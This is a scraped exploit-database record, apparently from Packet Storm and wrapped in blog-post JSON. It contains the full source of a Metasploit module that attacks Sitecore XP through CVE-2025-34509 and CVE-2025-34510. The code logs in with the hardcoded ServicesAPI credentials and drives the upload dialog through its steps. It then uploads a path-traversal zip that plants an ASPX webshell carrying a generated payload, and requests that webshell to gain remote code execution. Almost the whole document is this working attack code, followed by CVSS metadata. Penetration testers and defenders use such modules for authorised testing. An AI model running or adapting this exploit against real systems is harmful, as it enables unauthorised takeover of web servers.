{“lastseen”:”2025-09-12T17:08:04″,”description”:”This Metasploit module exploits Sitecore…”,”published”:”2025-09-12T00:00:00″,”modified”:”2025-09-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sitecore XP Post-Authentication Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209454″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34509″,”CVE-2025-34510″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n require ‘rex\/zip’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n \\n Rank = ExcellentRanking\\n include Msf::Exploit::Remote::HTTP::SitecoreXp\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 – hardcoded credentials of ServicesAPI account – to gain foothold.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Piotr Bazydlo’, # Discovery\\n ‘msutovsky-r7’ # Module Creator\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-34510’],\\n [‘URL’, ‘https:\/\/labs.watchtowr.com\/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform’],\\n [‘URL’, ‘https:\/\/support.sitecore.com\/kb?id=kb_article_view\\u0026sysparm_article=KB1003667’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-06-17’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Windows’,\\n {\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ]\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 443,\\n ‘SSL’ =\\u003e true\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Path to the vulnerable endpoint’, ‘\/’]),\\n ])\\n end\\n \\n def check\\n return Exploit::CheckCode::Unknown(‘Could not log in, application might not be Sitecore’) unless login_identitysrv(‘ServicesAPI’, ‘b’)\\n \\n @is_logged = true\\n \\n return Exploit::CheckCode::Safe(‘Could not get elevated cookies’) unless get_identity_cookies\\n \\n @is_elevated = true\\n \\n sitecore_version = get_version\\n \\n return Exploit::CheckCode::Vulnerable(\\”Sitecore version detected #{sitecore_version}, which is vulnerable\\”) if sitecore_version.between?(Rex::Version.new(‘10.0.0’), Rex::Version.new(‘10.4’))\\n \\n Exploit::CheckCode::Safe(\\”Detected Sitecore version #{sitecore_version}, which is not vulnerable\\”)\\n end\\n \\n def upload_step(data)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(‘sitecore’, ‘shell’, ‘Applications’, ‘Dialogs’, ‘Upload’, ‘Upload2.aspx’),\\n ‘vars_get’ =\\u003e { ‘hdl’ =\\u003e ‘sc_ct_trk’ },\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e data\\n })\\n res\\n end\\n \\n def upload_zipslip\\n fake_zip = \\”#{Rex::Text.rand_text_alphanumeric(10)}.zip\\”\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(‘sitecore’, ‘shell’, ‘Applications’, ‘Dialogs’, ‘Upload’, ‘Upload2.aspx’),\\n ‘vars_get’ =\\u003e { ‘hdl’ =\\u003e ‘sc_ct_trk’ },\\n ‘keep_cookies’ =\\u003e true\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n hidden_inputs = res.get_hidden_inputs\\n html_body = res.get_html_document\\n \\n view_state = html_body.at(\\”input[@name=’__VIEWSTATE’]\\”)\\n \\n file_el = html_body.xpath(‘\/\/input’).find { |link| link[‘name’] =~ \/File([0-9]+)\/ }\\n \\n return false unless hidden_inputs \\u0026\\u0026 view_state \\u0026\\u0026 file_el\\n \\n file_param = file_el[‘name’]\\n \\n proto = datastore[‘ssl’] ? ‘https’ : ‘http’\\n \\n res = upload_step({\\n ‘__PARAMETERS’ =\\u003e ‘FileChange’,\\n ‘__EVENTTARGET’ =\\u003e file_param,\\n ‘__EVENTARGUMENT’ =\\u003e ”,\\n ‘__SOURCE’ =\\u003e file_param,\\n ‘__EVENTTYPE’ =\\u003e ‘change’,\\n ‘__CONTEXTMENU’ =\\u003e ”,\\n ‘__MODIFIED’ =\\u003e ”,\\n ‘__ISEVENT’ =\\u003e ‘1’,\\n ‘__SHIFTKEY’ =\\u003e ”,\\n ‘__CTRLKEY’ =\\u003e ”,\\n ‘__ALTKEY’ =\\u003e ”,\\n ‘__BUTTON’ =\\u003e ‘undefined’,\\n ‘__KEYCODE’ =\\u003e ‘undefined’,\\n ‘__X’ =\\u003e ‘undefined’,\\n ‘__Y’ =\\u003e ‘undefined’,\\n ‘__URL’ =\\u003e \\”#{proto}:\/\/#{datastore[‘vhost’]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\”,\\n ‘__CSRFTOKEN’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’),\\n ‘__VIEWSTATE’ =\\u003e view_state[‘value’],\\n ‘Language’ =\\u003e hidden_inputs.dig(0, ‘Language’),\\n ‘Item’ =\\u003e hidden_inputs.dig(0, ‘Item’),\\n ‘Path’ =\\u003e hidden_inputs.dig(0, ‘Path’),\\n ‘Unzip’ =\\u003e ‘0’,\\n ‘Overwrite’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’),\\n file_param =\\u003e ‘C%3A%5Cfakepath%5C’ + fake_zip,\\n ‘ffSubmitForm’ =\\u003e ”\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n json_data = res.get_json_document\\n \\n return false unless json_data.dig(‘commands’, 1, ‘value’) =~ \/name=\\”File([a-zA-Z0-9]+)\\”\/\\n \\n new_file_input = \\”File#{Regexp.last_match(1)}\\”\\n \\n res = upload_step({\\n ‘__PARAMETERS’ =\\u003e ”,\\n ‘__EVENTTARGET’ =\\u003e ‘NextButton’,\\n ‘__EVENTARGUMENT’ =\\u003e ”,\\n ‘__SOURCE’ =\\u003e ‘NextButton’,\\n ‘__EVENTTYPE’ =\\u003e ‘click’,\\n ‘__CONTEXTMENU’ =\\u003e ”,\\n ‘__MODIFIED’ =\\u003e ”,\\n ‘__ISEVENT’ =\\u003e ‘1’,\\n ‘__SHIFTKEY’ =\\u003e ”,\\n ‘__CTRLKEY’ =\\u003e ”,\\n ‘__ALTKEY’ =\\u003e ”,\\n ‘__BUTTON’ =\\u003e ‘0’,\\n ‘__KEYCODE’ =\\u003e ‘undefined’,\\n ‘__X’ =\\u003e ‘1525’,\\n ‘__Y’ =\\u003e ‘1258’,\\n ‘__URL’ =\\u003e \\”#{proto}:\/\/#{datastore[‘vhost’]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\”,\\n ‘__CSRFTOKEN’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’),\\n ‘__VIEWSTATE’ =\\u003e view_state[‘value’],\\n ‘Language’ =\\u003e hidden_inputs.dig(0, ‘Language’),\\n ‘Item’ =\\u003e hidden_inputs.dig(0, ‘Item’),\\n ‘Path’ =\\u003e hidden_inputs.dig(0, ‘Path’),\\n ‘Unzip’ =\\u003e ‘0’,\\n ‘Overwrite’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’),\\n new_file_input =\\u003e ”,\\n file_param =\\u003e ‘C%3A%5Cfakepath%5C’ + fake_zip,\\n ‘ffSubmitForm’ =\\u003e ”\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n res = upload_step({\\n ‘__PARAMETERS’ =\\u003e ”,\\n ‘__EVENTTARGET’ =\\u003e ‘NextButton’,\\n ‘__EVENTARGUMENT’ =\\u003e ”,\\n ‘__SOURCE’ =\\u003e ‘NextButton’,\\n ‘__EVENTTYPE’ =\\u003e ‘click’,\\n ‘__CONTEXTMENU’ =\\u003e ”,\\n ‘__MODIFIED’ =\\u003e ”,\\n ‘__ISEVENT’ =\\u003e ‘1’,\\n ‘__SHIFTKEY’ =\\u003e ”,\\n ‘__CTRLKEY’ =\\u003e ”,\\n ‘__ALTKEY’ =\\u003e ”,\\n ‘__BUTTON’ =\\u003e ‘0’,\\n ‘__KEYCODE’ =\\u003e ‘undefined’,\\n ‘__X’ =\\u003e ‘1524’,\\n ‘__Y’ =\\u003e ‘1265’,\\n ‘__URL’ =\\u003e \\”#{proto}:\/\/#{datastore[‘vhost’]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\”,\\n ‘__CSRFTOKEN’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’),\\n ‘__VIEWSTATE’ =\\u003e view_state[‘value’],\\n ‘Language’ =\\u003e hidden_inputs.dig(0, ‘Language’),\\n ‘Item’ =\\u003e hidden_inputs.dig(0, ‘Item’),\\n ‘Path’ =\\u003e hidden_inputs.dig(0, ‘Path’),\\n ‘Unzip’ =\\u003e ‘0’,\\n ‘Overwrite’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’),\\n new_file_input =\\u003e ”,\\n file_param =\\u003e ‘C%3A%5Cfakepath%5C’ + fake_zip,\\n ‘ffSubmitForm’ =\\u003e ”\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n res = upload_step({\\n ‘__PARAMETERS’ =\\u003e ‘upload:unzipclicked’,\\n ‘__EVENTTARGET’ =\\u003e ‘UnzipCheck’,\\n ‘__EVENTARGUMENT’ =\\u003e ”,\\n ‘__SOURCE’ =\\u003e ‘UnzipCheck’,\\n ‘__EVENTTYPE’ =\\u003e ‘change’,\\n ‘__CONTEXTMENU’ =\\u003e ”,\\n ‘__MODIFIED’ =\\u003e ”,\\n ‘__ISEVENT’ =\\u003e ‘1’,\\n ‘__SHIFTKEY’ =\\u003e ”,\\n ‘__CTRLKEY’ =\\u003e ”,\\n ‘__ALTKEY’ =\\u003e ”,\\n ‘__BUTTON’ =\\u003e ‘undefined’,\\n ‘__KEYCODE’ =\\u003e ‘undefined’,\\n ‘__X’ =\\u003e ‘undefined’,\\n ‘__Y’ =\\u003e ‘undefined’,\\n ‘__URL’ =\\u003e \\”#{proto}:\/\/#{datastore[‘vhost’]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\”,\\n ‘__CSRFTOKEN’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’),\\n ‘__VIEWSTATE’ =\\u003e view_state[‘value’],\\n ‘Language’ =\\u003e hidden_inputs.dig(0, ‘Language’),\\n ‘Item’ =\\u003e hidden_inputs.dig(0, ‘Item’),\\n ‘Path’ =\\u003e hidden_inputs.dig(0, ‘Path’),\\n ‘Unzip’ =\\u003e ‘0’,\\n ‘Overwrite’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’),\\n new_file_input =\\u003e ”,\\n file_param =\\u003e ‘C%3A%5Cfakepath%5C’ + fake_zip,\\n ‘UnzipCheck’ =\\u003e ‘1’,\\n ‘ffSubmitForm’ =\\u003e ”\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n res = upload_step({\\n ‘__PARAMETERS’ =\\u003e ”,\\n ‘__EVENTTARGET’ =\\u003e ‘NextButton’,\\n ‘__EVENTARGUMENT’ =\\u003e ”,\\n ‘__SOURCE’ =\\u003e ‘NextButton’,\\n ‘__EVENTTYPE’ =\\u003e ‘click’,\\n ‘__CONTEXTMENU’ =\\u003e ”,\\n ‘__MODIFIED’ =\\u003e ”,\\n ‘__ISEVENT’ =\\u003e ‘1’,\\n ‘__SHIFTKEY’ =\\u003e ”,\\n ‘__CTRLKEY’ =\\u003e ”,\\n ‘__ALTKEY’ =\\u003e ”,\\n ‘__BUTTON’ =\\u003e ‘0’,\\n ‘__KEYCODE’ =\\u003e ‘undefined’,\\n ‘__X’ =\\u003e ‘1523’,\\n ‘__Y’ =\\u003e ‘1257’,\\n ‘__URL’ =\\u003e \\”#{proto}:\/\/#{datastore[‘vhost’]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\”,\\n ‘__CSRFTOKEN’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’),\\n ‘__VIEWSTATE’ =\\u003e view_state[‘value’],\\n ‘Language’ =\\u003e hidden_inputs.dig(0, ‘Language’),\\n ‘Item’ =\\u003e hidden_inputs.dig(0, ‘Item’),\\n ‘Path’ =\\u003e hidden_inputs.dig(0, ‘Path’),\\n ‘Unzip’ =\\u003e ‘0’,\\n ‘Overwrite’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’),\\n new_file_input =\\u003e ”,\\n file_param =\\u003e ‘C%3A%5Cfakepath%5C’ + fake_zip,\\n ‘UnzipCheck’ =\\u003e ‘1’,\\n ‘ffSubmitForm’ =\\u003e ”\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n res = upload_step({\\n ‘__PARAMETERS’ =\\u003e ‘StartUploading’,\\n ‘__EVENTTARGET’ =\\u003e ”,\\n ‘__EVENTARGUMENT’ =\\u003e ”,\\n ‘__SOURCE’ =\\u003e ”,\\n ‘__EVENTTYPE’ =\\u003e ”,\\n ‘__CONTEXTMENU’ =\\u003e ”,\\n ‘__MODIFIED’ =\\u003e ”,\\n ‘__ISEVENT’ =\\u003e ‘1’,\\n ‘__CSRFTOKEN’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’),\\n ‘__VIEWSTATE’ =\\u003e view_state[‘value’],\\n ‘Language’ =\\u003e hidden_inputs.dig(0, ‘Language’),\\n ‘Item’ =\\u003e hidden_inputs.dig(0, ‘Item’),\\n ‘Path’ =\\u003e hidden_inputs.dig(0, ‘Path’),\\n ‘Unzip’ =\\u003e ‘1’,\\n ‘Overwrite’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’),\\n new_file_input =\\u003e ”,\\n file_param =\\u003e ‘C%3A%5Cfakepath%5C’ + fake_zip,\\n ‘UnzipCheck’ =\\u003e ‘1’,\\n ‘ffSubmitForm’ =\\u003e ”\\n })\\n \\n return false unless res\\u0026.code == 200\\n \\n zip = Rex::Zip::Archive.new\\n \\n @webshell_file = \\”#{Rex::Text.rand_text_alpha(15)}.aspx\\”\\n exe = generate_payload_exe\\n asp = Msf::Util::EXE.to_exe_aspx(exe)\\n \\n zip.add_file(‘\/\/\\\\\/..\/’ + @webshell_file, asp)\\n \\n zip_data = zip.pack\\n \\n vars_form_data = [\\n { ‘name’ =\\u003e ‘__CSRFTOKEN’, ‘data’ =\\u003e hidden_inputs.dig(0, ‘__CSRFTOKEN’) },\\n { ‘name’ =\\u003e ‘__VIEWSTATE’, ‘data’ =\\u003e view_state[‘value’] },\\n { ‘name’ =\\u003e ‘Item’, ‘data’ =\\u003e hidden_inputs.dig(0, ‘Item’) },\\n { ‘name’ =\\u003e ‘Language’, ‘data’ =\\u003e hidden_inputs.dig(0, ‘Language’) },\\n { ‘name’ =\\u003e ‘Path’, ‘data’ =\\u003e hidden_inputs.dig(0, ‘Path’) },\\n { ‘name’ =\\u003e ‘Unzip’, ‘data’ =\\u003e ‘1’ },\\n { ‘name’ =\\u003e ‘Overwrite’, ‘data’ =\\u003e hidden_inputs.dig(0, ‘Overwrite’) },\\n { ‘name’ =\\u003e file_param, ‘data’ =\\u003e zip_data, ‘content_type’ =\\u003e ‘application\/zip’, ‘encoding’ =\\u003e ‘binary’, ‘filename’ =\\u003e fake_zip },\\n { ‘name’ =\\u003e new_file_input, ‘data’ =\\u003e ”, ‘content_type’ =\\u003e ‘application\/octet-stream’, ‘filename’ =\\u003e ” }\\n ]\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(‘sitecore’, ‘shell’, ‘Applications’, ‘Dialogs’, ‘Upload’, ‘Upload2.aspx’),\\n ‘vars_get’ =\\u003e { ‘hdl’ =\\u003e ‘sc_ct_trk’ },\\n ‘vars_form_data’ =\\u003e vars_form_data\\n })\\n \\n return false unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘Done’)\\n \\n true\\n end\\n \\n def trigger_payload\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(@webshell_file)\\n })\\n end\\n \\n def exploit\\n if !@is_logged \\u0026\\u0026 !login_identitysrv(‘ServicesAPI’, ‘b’)\\n fail_with(Failure::NoAccess, ‘Failed to log in, check the credentials’)\\n end\\n \\n if !@is_elevated \\u0026\\u0026 !get_identity_cookies\\n fail_with(Failure::Unknown, ‘Failed to get elevated cookies’)\\n end\\n \\n fail_with(Failure::PayloadFailed, ‘Failed to upload malicious ZIP’) unless upload_zipslip\\n \\n trigger_payload\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/209454″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/209454\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-12T17:08:04″,”description”:”This Metasploit module exploits Sitecore…”,”published”:”2025-09-12T00:00:00″,”modified”:”2025-09-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sitecore XP Post-Authentication Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:209454″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34509″,”CVE-2025-34510″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n require ‘rex\/zip’\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-17262","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n